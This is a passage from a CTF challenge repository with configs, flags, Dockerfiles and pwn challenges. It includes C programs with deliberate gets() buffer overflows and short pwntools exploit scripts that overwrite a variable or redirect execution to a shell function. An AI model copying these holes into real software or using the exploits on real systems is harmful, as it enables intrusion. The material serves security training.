Write-up 4 | 5 | Words files, like most of office files and Libreoffice are structured as zips. 6 | Unzip the file, and find the flag on the setting.xml 7 | 8 | ## Flag 9 | 10 | `shellmates{w0RDS_aRE_JUst_S0M3_ZiP}` 11 | -------------------------------------------------------------------------------- /misc/imageData/README.md: -------------------------------------------------------------------------------- 1 | # Image Data 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | You are so nice I'm giving you a canvas image data! 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /misc/imageData/solution/README.md: -------------------------------------------------------------------------------- 1 | # Image Data 2 | 3 | ## Write-up 4 | 5 | Create a js canvas, and parse the image data. 6 | Read about it [here](https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Tutorial) 7 | 8 | ## Flag 9 | 10 | `shellmates{canv4s-J$_Is_$o_fuN}` 11 | -------------------------------------------------------------------------------- /programming/README.md: -------------------------------------------------------------------------------- 1 | # Programming 2 | 3 | This directory contains challenges related to the `Programming` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /programming/RPS/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | RUN pip3 install termcolor 8 | 9 | COPY challenge /challenge/ 10 | 11 | WORKDIR /challenge 12 | 13 | RUN chmod +x challenge.py entrypoint.sh 14 | 15 | ENTRYPOINT ["./entrypoint.sh"] 16 | -------------------------------------------------------------------------------- /programming/RPS/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="python3 ./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /programming/RPS/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /programming/chess.INI/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | RUN pip3 install termcolor 8 | 9 | COPY challenge /challenge/ 10 | 11 | WORKDIR /challenge 12 | 13 | RUN chmod +x challenge.py entrypoint.sh 14 | 15 | ENTRYPOINT ["./entrypoint.sh"] 16 | -------------------------------------------------------------------------------- /programming/chess.INI/README.md: -------------------------------------------------------------------------------- 1 | # chess.INI 2 | 3 | ## Write-up 4 | - Did you heard about chess!!! sure you did. 5 | - Your mission now is to find the length of path that the king (K) takes to reach the target (T). 6 | - the pawns (p) are like obstacles that the king can't pass. 7 | - learn more about king's moves here : https://en.wikipedia.org/wiki/King_(chess) 8 | ## Flag 9 | 10 | `shellmates{ch355_M4k35_M3n_w153r_4nd_CL34R-519H73D}` -------------------------------------------------------------------------------- /programming/chess.INI/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "chess.INI" 2 | author: "yh_0x7" 3 | author_link: "github.com/yh-0x7" 4 | category: programming 5 | difficulty: medhard 6 | 7 | description: | 8 | > Did you heard about chess!!! sure you did. 9 | > Your mission now is to find the length of path that the king (K) takes to reach the target (T). 10 | > the pawns (p) are like obstacles that the king can't pass. 11 | > learn more about king's moves here : https://en.wikipedia.org/wiki/King_(chess) 12 | 13 | **Author** : yh_0x7 14 | flags: 15 | - shellmates{ch355_M4k35_M3n_w153r_4nd_CL34R-519H73D} 16 | 17 | topics: 18 | - scripting 19 | - programming 20 | - chess 21 | 22 | tags: 23 | - programming 24 | - scripting 25 | - medium/hard 26 | 27 | value: 500 28 | type: dynamic 29 | extra: 30 | initial: 500 31 | decay: 15 32 | minimum: 50 33 | state: visible 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /programming/chess.INI/challenge/.passwd: -------------------------------------------------------------------------------- 1 | shellmates{ch355_M4k35_M3n_w153r_4nd_CL34R-519H73D} -------------------------------------------------------------------------------- /programming/chess.INI/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /programming/chess.INI/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /programming/zero-to-hero/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x entrypoint.sh 13 | 14 | ENTRYPOINT ["./entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /programming/zero-to-hero/README.md: -------------------------------------------------------------------------------- 1 | # from zero to hero 2 | 3 | **`Author:`** [ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > Start your journey and be the one who learns them all. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /programming/zero-to-hero/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "from zero to hero" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | category: programming 5 | 6 | difficulty: medium 7 | description: | 8 | > Start your journey and be the one who learns them all. 9 | 10 | **Author** : Ouxs 11 | 12 | connection_info: ncat -v --ssl zero-to-hero.challs.shellmates.club 443 13 | 14 | 15 | flags: 16 | - shellmates{T0POLOGICAL_$0RTING_FTW____!!!} 17 | 18 | tags: 19 | - medium 20 | 21 | value: 500 22 | type: dynamic 23 | extra: 24 | initial: 500 25 | decay: 15 26 | minimum: 50 27 | 28 | state: visible 29 | version: "0.1" 30 | -------------------------------------------------------------------------------- /programming/zero-to-hero/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./chall.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /programming/zero-to-hero/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /programming/zero-to-hero/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | # 1 - Build graph skill --> (skills needed) 5 | # 2 - Direct application of topological sorting 6 | 7 | import graphlib 8 | from pwn import * 9 | 10 | begin, l = 9, 10 11 | host, port = "zero-to-hero.challs.shellmates.club", 443 12 | 13 | def make_graph(r): 14 | dpnds = {} 15 | for line in r : 16 | skill, skills = line.split(":") 17 | skill = skill[begin:begin+l] 18 | skills = skills.strip() 19 | if skills : 20 | skills = skills.split("-") 21 | else : 22 | skills = [] 23 | dpnds[skill] = skills 24 | return dpnds 25 | 26 | def main(): 27 | p = remote(host, port, ssl=True) 28 | p.recvuntil("randomly\n\n") 29 | for i in range(90): 30 | r = p.recvuntil('\nPath -> ',drop=True).decode().split("\n") 31 | g = make_graph(r) 32 | try : 33 | result = "-".join(graphlib.TopologicalSorter(g).static_order()) 34 | except graphlib.CycleError : 35 | result = "impossible" 36 | p.sendline(result) 37 | p.interactive() 38 | 39 | if __name__ == '__main__': 40 | main() -------------------------------------------------------------------------------- /pwn/B0F0/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update && apt-get install socat -y && apt-get install gcc-multilib -y 4 | 5 | COPY challenge /challenge 6 | 7 | WORKDIR /challenge 8 | 9 | RUN chmod +x entrypoint.sh challenge && \ 10 | chown -R root:root . 11 | 12 | EXPOSE 1337 13 | 14 | ENTRYPOINT ["/challenge/entrypoint.sh"] -------------------------------------------------------------------------------- /pwn/B0F0/README.md: -------------------------------------------------------------------------------- 1 | # B0F0 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | > I can't change my date, can you ? 7 | 8 | ### Connect with : nc localhost 1337 9 | 10 | ### [challenge.c](src/chellenge.c) 11 | 12 | 13 | ## Solution 14 | Solution of the challenge can be found [here](solution/). 15 | -------------------------------------------------------------------------------- /pwn/B0F0/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "B0F0" 2 | author: "1m4D" 3 | author_link: "https://github.com/imadbourouche" 4 | 5 | category: pwn 6 | 7 | difficulty: easy 8 | 9 | description: | 10 | > I can't change my date, can you ? 11 | 12 | **Author** : 1m4D 13 | 14 | flags: 15 | - shellamtes{Y0u_H4vE_ChE4ngED_mY_V4R14Ble_98765} 16 | 17 | connection_info: ncat -v --ssl bof0.challs.shellmates.club 443 18 | 19 | files: 20 | - ./src/challenge.c 21 | - ./challenge/challenge 22 | 23 | tags: 24 | - easy 25 | 26 | value: 500 27 | 28 | type: dynamic 29 | 30 | extra: 31 | initial: 500 32 | decay: 15 33 | minimum: 50 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /pwn/B0F0/challenge/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/B0F0/challenge/challenge -------------------------------------------------------------------------------- /pwn/B0F0/challenge/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie -fno-stack-protector challenge.c -o challenge 7 | 8 | int main(){ 9 | setbuf(stdin, NULL); 10 | setbuf(stdout, NULL); 11 | setbuf(stderr, NULL); 12 | 13 | int date=2852022; 14 | char name[128]; 15 | 16 | printf("Give me your name: "); 17 | gets(name); 18 | 19 | printf("Date = %d\n",date); 20 | if(date == 2752022){ 21 | printf("You win\n"); 22 | system("/bin/cat flag"); 23 | }else{ 24 | printf("You are not allowed\n"); 25 | } 26 | return 0; 27 | } -------------------------------------------------------------------------------- /pwn/B0F0/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./challenge" 4 | socat -d -T60 tcp-l:1337,reuseaddr,fork,keepalive,su=nobody exec:$EXEC,stderr 5 | -------------------------------------------------------------------------------- /pwn/B0F0/challenge/flag: -------------------------------------------------------------------------------- 1 | shellamtes{Y0u_H4vE_ChE4ngED_mY_V4R14Ble_98765} 2 | -------------------------------------------------------------------------------- /pwn/B0F0/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - '1502:1337' 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 -------------------------------------------------------------------------------- /pwn/B0F0/solution/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | from pwn import * 5 | 6 | 7 | p=b'a'*128 8 | 9 | #conn = process("../challenge/challenge") 10 | conn=remote("127.0.0.1",1337) 11 | 12 | conn.sendline(p+struct.pack('I', 0x29FE16)) 13 | print(conn.recvall()) 14 | -------------------------------------------------------------------------------- /pwn/B0F0/src/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie -fno-stack-protector challenge.c -o challenge 7 | 8 | int main(){ 9 | int date=2852022; 10 | char name[128]; 11 | 12 | setbuf(stdin, NULL); 13 | setbuf(stdout, NULL); 14 | setbuf(stderr, NULL); 15 | 16 | printf("Give me your name: "); 17 | gets(name); 18 | printf("date = %d\n",date); 19 | if(date == 2752022){ 20 | printf("You win\n"); 21 | system("/bin/cat flag"); 22 | }else{ 23 | printf("You are not allowed\n"); 24 | } 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /pwn/B0F1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update && apt-get install socat -y && apt-get install gcc-multilib -y 4 | 5 | COPY challenge /challenge 6 | 7 | WORKDIR /challenge 8 | 9 | RUN chmod +x entrypoint.sh challenge && \ 10 | chown -R root:root . 11 | 12 | EXPOSE 1337 13 | 14 | ENTRYPOINT ["/challenge/entrypoint.sh"] -------------------------------------------------------------------------------- /pwn/B0F1/README.md: -------------------------------------------------------------------------------- 1 | # B0F1 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | > Open a shell and get your flag :D 7 | 8 | ### Connect with : nc localhost 1337 9 | 10 | ### [challenge.c](src/chellenge.c) 11 | 12 | 13 | ## Solution 14 | Solution of the challenge can be found [here](solution/). 15 | -------------------------------------------------------------------------------- /pwn/B0F1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "B0F1" 2 | author: "1m4D" 3 | author_link: "https://github.com/imadbourouche" 4 | 5 | category: pwn 6 | 7 | difficulty: ezmed 8 | 9 | description: | 10 | > Open a shell and get your flag :D 11 | 12 | **Author** : 1m4D 13 | 14 | flags: 15 | - shellamtes{Y0u_4lS0_GET_A_$HEll_65431} 16 | 17 | connection_info: ncat -v --ssl bof1.challs.shellmates.club 443 18 | 19 | files: 20 | - ./src/challenge.c 21 | - ./challenge/challenge 22 | 23 | tags: 24 | - easy/medium 25 | 26 | value: 500 27 | 28 | type: dynamic 29 | 30 | extra: 31 | initial: 500 32 | decay: 15 33 | minimum: 50 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /pwn/B0F1/challenge/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/B0F1/challenge/challenge -------------------------------------------------------------------------------- /pwn/B0F1/challenge/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie -fno-stack-protector challenge.c -o challenge 7 | 8 | void open_shell(int password){ 9 | if (password==1337){ 10 | printf("good job you get a shell :)\n"); 11 | system("/bin/sh"); 12 | exit(0); 13 | }else{ 14 | printf("password incorrect\n"); 15 | exit(0); 16 | } 17 | } 18 | 19 | void say_my_name(){ 20 | char name[20]; 21 | printf("Give me your name: "); 22 | gets(name); 23 | printf("Hello %s\n",name); 24 | } 25 | 26 | 27 | int main(){ 28 | setbuf(stdin, NULL); 29 | setbuf(stdout, NULL); 30 | setbuf(stderr, NULL); 31 | 32 | 33 | say_my_name(); 34 | return 0; 35 | } -------------------------------------------------------------------------------- /pwn/B0F1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./challenge" 4 | socat -d -T60 tcp-l:1337,reuseaddr,fork,keepalive,su=nobody exec:$EXEC,stderr 5 | -------------------------------------------------------------------------------- /pwn/B0F1/challenge/flag: -------------------------------------------------------------------------------- 1 | shellamtes{Y0u_4lS0_GET_A_$HEll_65431} -------------------------------------------------------------------------------- /pwn/B0F1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - '1503:1337' 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 -------------------------------------------------------------------------------- /pwn/B0F1/solution/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | from pwn import * 5 | 6 | 7 | win_addr=0x080491c6 8 | p=b"a"*32 9 | 10 | #conn = process("./challenge") 11 | conn=remote("127.0.0.1",1337) 12 | conn.sendline(p+struct.pack('I', win_addr)+b'r'*4+struct.pack('I', 1337)) 13 | #print(conn.recv()) 14 | conn.interactive() -------------------------------------------------------------------------------- /pwn/B0F1/src/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie -fno-stack-protector challenge.c -o challenge 7 | 8 | void open_shell(int password){ 9 | if (password==1337){ 10 | printf("good job you get a shell :)\n"); 11 | system("/bin/sh"); 12 | exit(0); 13 | }else{ 14 | printf("password incorrect\n"); 15 | exit(0); 16 | } 17 | } 18 | 19 | void say_my_name(){ 20 | char name[20]; 21 | printf("Give me your name: \n"); 22 | gets(name); 23 | printf("Hello %s\n",name); 24 | } 25 | 26 | 27 | int main(){ 28 | setbuf(stdin, NULL); 29 | setbuf(stdout, NULL); 30 | setbuf(stderr, NULL); 31 | 32 | say_my_name(); 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /pwn/README.md: -------------------------------------------------------------------------------- 1 | # Pwn 2 | 3 | This directory contains challenges related to the `Pwn` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /pwn/no-way-out/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y socat && \ 5 | rm -rf /var/lib/apt/lists/* 6 | 7 | RUN useradd ctf && \ 8 | mkdir /challenge 9 | 10 | COPY challenge /challenge 11 | 12 | WORKDIR /challenge 13 | 14 | RUN chmod +x entrypoint.sh no-way-out && \ 15 | chown -R root:root . 16 | 17 | USER ctf 18 | 19 | EXPOSE 1337 20 | 21 | ENTRYPOINT ["./entrypoint.sh"] 22 | -------------------------------------------------------------------------------- /pwn/no-way-out/README.md: -------------------------------------------------------------------------------- 1 | # No Way Out 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Can you escape this nightmare? 8 | 9 | **Connect with**: `ncat -v --ssl no-way-out.challs.shellmates.club 443` 10 | 11 | [no-way-out](challenge/no-way-out) 12 | [libc-2.27.so](dist/libc-2.27.so) 13 | [ld-2.27.so](dist/ld-2.27.so) 14 | 15 | ## Solution 16 | 17 | Solution of the challenge can be found [here](solution/). 18 | 19 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "No Way Out" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: pwn 6 | difficulty: medhard 7 | 8 | description: | 9 | > Can you escape this nightmare? 10 | 11 | **Author**: chenx3n 12 | 13 | connection_info: ncat -v --ssl no-way-out.challs.shellmates.club 443 14 | 15 | image: gcr.io/glowing-reserve-336013/no-way-out 16 | 17 | value: 500 18 | type: dynamic 19 | 20 | extra: 21 | initial: 500 22 | decay: 15 23 | minimum: 50 24 | 25 | flags: 26 | - shellmates{0verwRITInG_FuTuRE_R3turn_aDdrEs$_l1ke_a_BOS$} 27 | 28 | files: 29 | - ./challenge/no-way-out 30 | - ./lib/libc-2.27.so 31 | - ./lib/ld-2.27.so 32 | 33 | tags: 34 | - medium/hard 35 | 36 | state: visible 37 | 38 | version: "0.1" 39 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./no-way-out" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{0verwRITInG_FuTuRE_R3turn_aDdrEs$_l1ke_a_BOS$} 2 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge/no-way-out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/no-way-out/challenge/no-way-out -------------------------------------------------------------------------------- /pwn/no-way-out/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1501:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /pwn/no-way-out/lib/ld-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/no-way-out/lib/ld-2.27.so -------------------------------------------------------------------------------- /pwn/no-way-out/lib/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/no-way-out/lib/libc-2.27.so -------------------------------------------------------------------------------- /pwn/no-way-out/solution/README.md: -------------------------------------------------------------------------------- 1 | # No Way Out 2 | 3 | ## Write-up (TODO) 4 | -------------------------------------------------------------------------------- /pwn/no-way-out/src/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | CFLAGS=-no-pie 3 | SOURCE=no-way-out.c 4 | OUTFILE=../challenge/no-way-out 5 | 6 | all: $(SOURCE) 7 | $(CC) $(SOURCE) $(CFLAGS) -o $(OUTFILE) 8 | clean: $(OUTFILE) 9 | rm -f $(OUTFILE) 10 | -------------------------------------------------------------------------------- /pwn/no-way-out/src/no-way-out.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void setup(void); 9 | void win(void); 10 | 11 | int main(int argc, char *argv[]) { 12 | int idx; 13 | char arr[8][8]; 14 | 15 | setup(); 16 | 17 | while (1) { 18 | printf("Idx: "); 19 | scanf("%d", &idx); 20 | 21 | if (idx >= 8) { 22 | printf("Wrong index!\n"); 23 | } else { 24 | printf("Data: "); 25 | read(0, arr[idx], 8); 26 | } 27 | } 28 | 29 | return 0; 30 | } 31 | 32 | void setup(void) { 33 | setbuf(stdin, NULL); 34 | setbuf(stdout, NULL); 35 | setbuf(stderr, NULL); 36 | } 37 | 38 | void win(void) { 39 | int fd; 40 | char buf[256] = { '\0' }; 41 | 42 | fd = open("/challenge/flag.txt", O_RDONLY); 43 | read(fd, buf, 256); 44 | write(1, buf, 256); 45 | } 46 | -------------------------------------------------------------------------------- /pwn/stronk-boi/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y socat && \ 5 | rm -rf /var/lib/apt/lists/* 6 | 7 | RUN useradd ctf && \ 8 | mkdir /challenge 9 | 10 | COPY challenge /challenge 11 | 12 | WORKDIR /challenge 13 | 14 | RUN chmod +x entrypoint.sh stronk-boi && \ 15 | chown -R root:root . 16 | 17 | USER ctf 18 | 19 | EXPOSE 1337 20 | 21 | ENTRYPOINT ["./entrypoint.sh"] 22 | -------------------------------------------------------------------------------- /pwn/stronk-boi/README.md: -------------------------------------------------------------------------------- 1 | # stronk boi 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Check out my revolutionary in-memory file service! 8 | 9 | **Connect with**: `ncat -v --ssl stronk-boi.challs.shellmates.club 443` 10 | 11 | [stronk-boi](challenge/stronk-boi) 12 | [libc-2.27.so](dist/libc-2.27.so) 13 | [ld-2.27.so](dist/ld-2.27.so) 14 | 15 | ## Solution 16 | 17 | Solution of the challenge can be found [here](solution/). 18 | -------------------------------------------------------------------------------- /pwn/stronk-boi/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "stronk boi" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: pwn 6 | difficulty: medhard 7 | 8 | description: | 9 | > Check out my revolutionary in-memory file service! 10 | 11 | **Author**: chenx3n 12 | 13 | connection_info: ncat -v --ssl stronk-boi.challs.shellmates.club 443 14 | 15 | image: gcr.io/glowing-reserve-336013/stronk-boi 16 | 17 | value: 500 18 | type: dynamic 19 | 20 | extra: 21 | initial: 500 22 | decay: 15 23 | minimum: 50 24 | 25 | flags: 26 | - shellmates{0K4Y_you_PRovEd_y0U_h4V3_tH3_fOrC3} 27 | 28 | files: 29 | - ./src/stronk-boi.c 30 | - ./challenge/stronk-boi 31 | - ./lib/libc-2.27.so 32 | - ./lib/ld-2.27.so 33 | 34 | tags: 35 | - medium/hard 36 | 37 | state: visible 38 | 39 | version: "0.1" 40 | -------------------------------------------------------------------------------- /pwn/stronk-boi/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./stronk-boi" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /pwn/stronk-boi/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{0K4Y_you_PRovEd_y0U_h4V3_tH3_fOrC3} -------------------------------------------------------------------------------- /pwn/stronk-boi/challenge/stronk-boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/challenge/stronk-boi -------------------------------------------------------------------------------- /pwn/stronk-boi/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1500:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /pwn/stronk-boi/lib/ld-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/lib/ld-2.27.so -------------------------------------------------------------------------------- /pwn/stronk-boi/lib/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/lib/libc-2.27.so -------------------------------------------------------------------------------- /pwn/stronk-boi/solution/README.md: -------------------------------------------------------------------------------- 1 | # stronk boi 2 | 3 | ## Write-up (TODO) 4 | -------------------------------------------------------------------------------- /pwn/stronk-boi/solution/ld-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/ld-2.27.so -------------------------------------------------------------------------------- /pwn/stronk-boi/solution/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/libc-2.27.so -------------------------------------------------------------------------------- /pwn/stronk-boi/solution/libc.so.6: -------------------------------------------------------------------------------- 1 | libc-2.27.so -------------------------------------------------------------------------------- /pwn/stronk-boi/solution/stronk-boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/stronk-boi -------------------------------------------------------------------------------- /pwn/stronk-boi/solution/stronk-boi_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/stronk-boi_patched -------------------------------------------------------------------------------- /pwn/stronk-boi/src/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | CFLAGS=-Wl,-z,relro,-z,now -fstack-protector 3 | SOURCE=stronk-boi.c 4 | OUTFILE=../challenge/stronk-boi 5 | 6 | all: $(SOURCE) 7 | $(CC) $(SOURCE) $(CFLAGS) -o $(OUTFILE) 8 | clean: $(OUTFILE) 9 | rm -f $(OUTFILE) 10 | -------------------------------------------------------------------------------- /reverse/6pack/README.md: -------------------------------------------------------------------------------- 1 | # Challenge Name 2 | 3 | **`Author:`** [yh_0x7](https://github.com/yh-0x7) 4 | 5 | ## Description 6 | - My friend sent me this binary [challenge.exe](challenge/challenge.exe). 7 | - He said that it's 